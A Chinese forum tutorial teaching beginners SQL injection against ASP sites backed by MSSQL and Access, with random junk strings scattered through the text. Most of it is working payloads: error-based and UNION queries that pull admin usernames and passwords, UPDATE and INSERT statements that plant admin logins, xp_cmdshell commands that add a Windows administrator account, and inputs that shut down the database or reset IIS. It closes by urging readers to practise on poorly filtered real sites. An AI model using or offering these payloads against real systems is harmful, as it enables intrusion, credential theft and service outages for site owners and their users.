[安全]菜鸟SQL注入详解

踏浪行歌

菜鸟SQL注入详解 * {% n' U. |6 w7 o / z; _* q: G# L; v' Y4 @, }网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。 不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的 东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。 $ o% J2 b$ M4 ]; M利用SQL进行添加，更改，查看记录。 ? w8 F; _5 L" \+ z& X

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。 ( n% V9 q, b2 Z0 M他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这 篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。

1，什么是SQL注入？ & X- d* g: r5 c! E* {3 m, a

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。 " E& N! J) q0 @8 b B当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。 # J \3 h+ `- k. ^' I举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和 密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户， 你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我 们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com 3 ^0 k# r' ~$ F \( E来表示一个存在注入漏洞的网页。

2，助手篇， & g ~/ O) `* u6 t, e& B先把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。 否则，不论服务器返回什么错误，我们都只能看到“HTTP500服务器错误”，不能获得更多的提示信息 / ?# a/ V; X9 w" j

。 : P" L$ ]3 L* D- H+ J

3，哪些网页能利用？ / \! S5 M$ c- E我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等 找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单： : G$ U- d5 r- O6 f3 s

<FORMaction=login.aspmethod=post> % S& w7 P' `& I& S( p% e' x6 v<input........ 5 W$ P# f% H9 s5 E$ V</FORM> 3 |% V# ?7 f5 m. D

这些网页，后缀如asp,jsp,cgi，php网页。 如：http://xxx.xxx.com/index.asp?id=10 - D3 i5 z/ h4 n; O7 W7 q! A上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面 来练手了。（要做个好人噢。（^_^）像小林一样的好人。）

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。 小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。 http://xxx.xxx.com/index.asp?id=10 返回错误信息： 6 z: y; O1 C2 ^: F$ v7 L; k4 ~8 k

MicrosoftOLEDBProviderforSQLServer错误80040e14 1 f) `( ]9 G3 E( O* G# M5 f. v

字符串之前有未闭合的引号。 3 l) b$ X! }' D$ X# u

/job/grxx.asp，行141

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为 通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？

http://xxx.xxx.com/index.asp?user=lamb

那我们就把引号放到lamb中间，如lamb . ]$ |( c8 l' C, z! K% K$ A呵呵，又出错了吧？

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看） # G; s2 x, M; {& X

当然，我们也可以提交： ! M5 j7 F- C- Vhttp://xxx.xxx.com/index.asp?id=10;ANDcolumnaaa=5(注，这里的columnaaa是我乱写的) ) l3 `$ r6 R6 s3 g出现错误信息： : Q- I2 ?5 n( @

MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Invalidcolumnnamecolumnaaa. ; M( q' O& n" ^8 I2 b

/job/grxx.asp，行27 这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。 8 q: Y! \" t. U$ D9 ?1 a' B9 ]

利用出错的信息，我们现在多少了解了这个站点的服务了吧？

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。 : l+ e8 \0 I; y9 J5 {要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUPBY或HAVING。如： ; ~2 Q+ U) f \. `

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 5 R5 J( v2 w' l. `, f: Y

出现错误信息： MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.newsidisinvalidinthe " H7 x0 o. S$ U7 x% `6 s1 u: \

selectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBY

clause. ; S' L) j3 }" u/ K9 N; M5 w

/more.asp，行27 / I8 Z2 w% S {. t, r3 g. a

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用

上GROUPBY，于是黑客就重复错误提交，直到没有得到错误。 这里要说明一下：分号在这里分离，%20是空格，--表示后面是一个注释，也就是说只是说明，不能去

执行代码。(*_*)

下面是具体例子： 7 B2 Z' L8 A* g. [" |

提交： : j [( g' ~! Q1 jhttp://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 6 v3 Q, C' m1 I" H1 }4 U8 Y; l( G' K得到article.newsid这真是好东西。 ! J1 g' h' X# M, Z o5 Q6 z提交： http://xxx.xxx.com/job/grxx.asp?id=23%20group%20by%20article.newsid%20having%201=1-- ' ?+ @$ f9 L! T! M& n& ~$ t得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) 9 R/ g5 G; z4 g5 a/ G

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.titleisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY

clause.

/more.asp，line20 ; q1 B, s% ~4 U# r2 `- `

得到： , x, ?2 C) W9 a8 [ ~5 U, ~4 Q" [9 Warticle.title 3 V5 v1 M1 u$ @* M5 h2 ~7 R) J我们反复地一个一个加上来提交。 & K4 P; H% D& i0 `得到错误信息： MicrosoftOLEDBProviderforODBCDrivers(0x80040E14) ' t0 b$ i' k3 r; |) W

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnadm.userNameisinvalidinthe

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY

clause. - E$ ]8 K! i3 S3 X

/more.asp，line56 ( C* @7 _9 a g4 I

这里要注意了，都到哪儿了？到下一个表了。 现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等

title

利用系统表： 4 w4 W) Q0 D [' F) z

下面，我们要确定表名来加入数据。 ; w) @8 L; H/ h) P系统表是MS-SQL2000的一部分，名叫sysObjectstable，我们将要用到查询UNIONSELECT,。 5 x, S+ }7 b$ A; g3 j9 Y" p+ {要从SysObjectstable有天地拿到表名，一般使用下面语句： ) A* B; X/ u, f$ q% ^& W3 M8 ESELECTnameFROMsysObjectsWHERExtype=UU是指明定议USER的表。 ) i4 ^0 A: I& A# p) M# R$ p$ I4 Z黑客们已经知道了表里的列， 7 _1 }% R' u6 p& ?现在他们能在下面加一些数字。甚至如下面的： , P7 ?4 }' A; y. [" m7 }: W

在地址栏里打入：

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT%; 201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U-- 8 Z8 X `2 d! m记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误， + Y3 T7 y; f$ ?

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT;TOP1TABLE_NAMEFROM

INFORMATION_SCHEMA.TABLES-- $ g( \( F$ M3 ?$ f; ~

MSSQL服务将试图去转换一个string(nvarchar)到integer。那么就会出错：

MicrosoftOLEDBProviderforODBCDriverserror80040e07 0 g0 t8 S+ m' s5 b[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

table1toacolumnofdatatypeint. /index.asp,line5 0 S# O/ \% r+ X$ p" O

这个错误信息很“友好”地告诉我们string(nvarchar)值不能被转换成integer。 这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。

5 q; n" s1 B6 R$ X) V5 R* x+ V要获得第二个表名，我们继续，用以下查询： % S- p( _( ~6 M+ ?' l+ ohttp://xxx.xxx.com/job/grxx.asp?id=23%20UNION;SELECTTOP1TABLE_NAMEFROM : x( F0 k. r7 y7 ~) g4 h! V8 x8 `. v

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMENOTIN(table1)-- ( @# P s7 i5 K* h7 v6 n5 T

也可以用关键字查找数据： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1TABLE_NAMEFROM 3 ^" A% y& g" d

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMELIKE%25ADMIN%25-- 0 A+ D6 f* }- r: J' J8 v现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 & X! E1 b# m8 h% x. l" n* v8 ]- G[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue ( c' k; ^+ Y; Q9 Q% i* r7 |

admin_logintoacolumnofdatatypeint. /index.asp,line5 1 ]) Q8 L. Q; v: _- V1 N

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作%ADMIN%。这样，我们就能获得符合标 8 E) C$ n7 }# K- ?4 S准的表名为"admin_login"的表了。 # V8 ^' u6 n1 R

那么，如何获得表里所有的列表？ % r: \* t5 v" i. o

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS出场！！！ http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_login-- 3 _. N; ~7 S" f3 y6 \

现在错误信息： / |9 k8 C# x# R; u& ?MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

u_idtoacolumnofdatatypeint. # l* [" d% G Y8 U% ^& ]7 }/index.asp,line6 看，我们有了第一个字段的名，我们用NOTIN()来获得下一个字段名： ( A; a. h4 v( s3 A& L1 \http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM 2 W g9 m* Y) G9 A" [- F7 _

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN 4 S* Q+ F. W; b+ A7 c( K

(u_id)-- 现在错误信息： 1 k" g1 r+ M9 T0 U5 \MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue , A3 R1 r B4 \( R0 K- i

u_nametoacolumnofdatatypeint. /index.asp,line5 我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息： 8 t6 D7 {6 m: shttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN 3 q) \' l( \+ ^7 ^

(u_id,u_name,password,contents)-- 0 ^% E+ x( N$ M* _4 L8 X现在错误信息： / G& |( r& [3 V4 Y' YMicrosoftOLEDBProviderforODBCDriverserror80040e14 [Microsoft][ODBCSQLServerDriver][SQLServer]ORDERBYitemsmustappearintheselect

listifthestatementcontainsaUNIONoperator. /index.asp,line5 % l* o5 g' Z. H4 B1 n, ]6。2如何找到我们要找的重要数据呢？ % C- e! p7 I; q' T现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。 现在，我们从"admin_login"表里取得第一个u_name： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1u_nameFROMadmin_login-- 0 T8 L J* D9 ~% c现在错误信息： % j$ @$ K, \. f8 _4 L7 ~7 e- b& nMicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue ' o0 x" X; x1 y. B5 M. c

adminroottoacolumnofdatatypeint. 0 H, a9 x2 H4 a; r6 j& ~/index.asp,line5 ) P9 R2 G+ m* s

5 U6 b% L* u C: |& S) O5 G我们知道，这里有登陆的用户名叫"adminroot"的管理员。最后，从数据库里获得"adminroot"的密码

： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere ) u, l5 G- X x1 G T5 L

u_name=adminroot-- ) w% \! ?& x: |: z) A2 V) ^: F2 T现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 ( i5 y' r; u0 o- o3 ]& C% D2 y[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

roottoacolumnofdatatypeint. ) A) H q: U) z4 z/index.asp,line5 我们现在能用户名"adminroot"密码："root"登陆了。 2 X/ z. C# |7 p- L$ ^

如何取得数字的值？ ' I! S; P! w# e- v: \$ I5 b

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。 + E( v8 P/ b: J5 l2 r让我们说说如何获得"tony"的密码，密码是"19840217": http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere

u_name=tony-- 我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整 8 Y$ F& }8 T- M- B: H' r; \. _合一个整型(10也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。 - p. [. Q- g( n6 S我们就得不到数字的登陆了。 要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1convert(int,

password%2b%20lambgirl)FROMadmin_loginwhereu_name=tony-- : }1 h0 p/ f) i

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+=0x2b 我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217lambgirl. 调出了转换了的函数。试着将19840217lambgirl转变成整型。SQL服务将出现ODBC错误： ( i' U8 f0 M' R5 ^) ]MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

19840217lambgirltoacolumnofdatatypeint. W# [5 N3 T$ _ w4 G7 ~/index.asp,line5 % J. k; K1 n( l$ K0 ]5 x现在，你就能用tony和密码：19840217lambgirl了。

+ a' T% G1 d8 ` u5 r如何在数据库修改，插入数据？ 0 k' o M8 v" q& U! r, `当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot" ]; {$ ] f6 V4 `的密码，我们

http://xxx.xxx.com/job/grxx.asp?id=23;UPDATEadmin_loginSETpassword=newpas5WHERE

u_name=adminroot-- ( A, a% Y" {; P9 Y0 _/ L9 C

要在数据表里插入新记录， . w1 U( ^4 o1 ^) j1 q' ^

http://xxx.xxx.com/job/grxx.asp?id=23;INSERTINTOadmin_login(u_id,u_name, 4 @2 D- u1 [3 U+ |" j) H+ J

password,contents)VALUES(123,xiaolin,pas,lambgirl)-- 现在，我们就能用xiaolinpas来登陆了。

如何远程执行SQL漏洞？ ; ~- {8 k: D% @$ p1 Z P

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MSSQL服务 在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell来执行远程破坏： ;execmaster..xp_cmdshellping192.168.0.2--

(如果单引号不能用，就换成双引号)

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。 9 ?+ y4 j- K7 g& f8 q7 |; a) O- e8 `为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。 / Y' O7 X r& y8 ~

#tcpdumpicmp ; o9 B, s( L' D; ~ @' \5 h) F; z9 @如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员 限制了WEB用户对xp_cmdshell等的权限。

如何找出MYSQL查询结果？ 这很容易用sp_makewebtask来把你查询的结果放到一个HTML里： ;EXECmaster..sp_makewebtask"\\192.168.0.2\share\girlxiaolin.html","SELECT*FROM

INFORMATION_SCHEMA.TABLES" $ } Q5 I; j7 S5 E但是目标IP必须共享文件夹。

8 x8 S& s+ r3 F. n Ohttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netusername password/add”--

xp_cmdshell用于调用系统命令，于是，用net命令新建了用户名为name、密码为password % s, v" R! w2 m Z的windows的帐号，接着： 3 o7 I0 b+ i/ u$ Ehttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netlocalgroupname

administrators/add”-- 将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用

xp_cmdshell。

其他方面，如利用SQL的命令填写： 将使SQL服务快速关闭 6 T$ S: f! g/ k7 \/ h1 b8 J9 F2 T' N用户名:;shutdownwithnowait;-- 密码:不填 7 @1 t3 E' C, r9 ]( B/ U

导致严重问题，网络故障。 : l% |' E. a2 [9 g2 K. q用户名:;execmaster..xp_cmdshelliisreset;-- 密码：不填 9 Z1 C+ l5 |5 ]8 Q+ w

关于ACCESS部分，

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10

出错的话，继续提交： * S# Y$ s% Y8 x9 ]/ ]先测试是否有ADMIN表， ! P1 Q( m8 |* C4 D1 E% H* S& Uhttp://xxx.xxx.com/index.asp?id=10and0<>(selectcount(*)fromadmin) ) @, v( |7 p% R6 O& G; T7 s

http://xxx.xxx.com/index.asp?id=10and1=(selectcount(*)fromadmin) + x7 ~ A, m: B2 D7 y没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段.

and1=(selectcount(*)fromadminwherelen(username)>0) . E3 p: O) C) D$ D5 d" j) Y如果出错，同理，我们也可以给它换一个名字。 接下来我们猜用户的具体名字。 " ?# c5 F7 }# E+ hand1=(selectcount(*)fromadminwhereleft(username,1)=l) 这时我们可以一个一个地来猜。 and1=(selectcount(*)fromadminwhereleft(username,2)=la) ; E5 W8 A4 K. @9 g! Y" r" z) g接下来猜密码，猜密码的道理同猜用户名一样。 and1=(selectcount(*)fromadminwhereleft(password,1)=l)

好了，不写了，这篇文章小林写了好几天了，累死了，还是条理不清楚。 5 k; z# M z7 C文章还有很多不全面的地方。还有一些专业术语，小林可能也有误，不过小菜们拿来看看还 - c/ B+ u5 w' m" v3 M8 b& a是行的啦。如果哪些写错了，请老鸟们加偶：165442496，告诉我错误，我会修正的。 我试过了，很多用MsSQL站点过滤不完整的网上也很多。所以大家可以找来练练手。

[em09]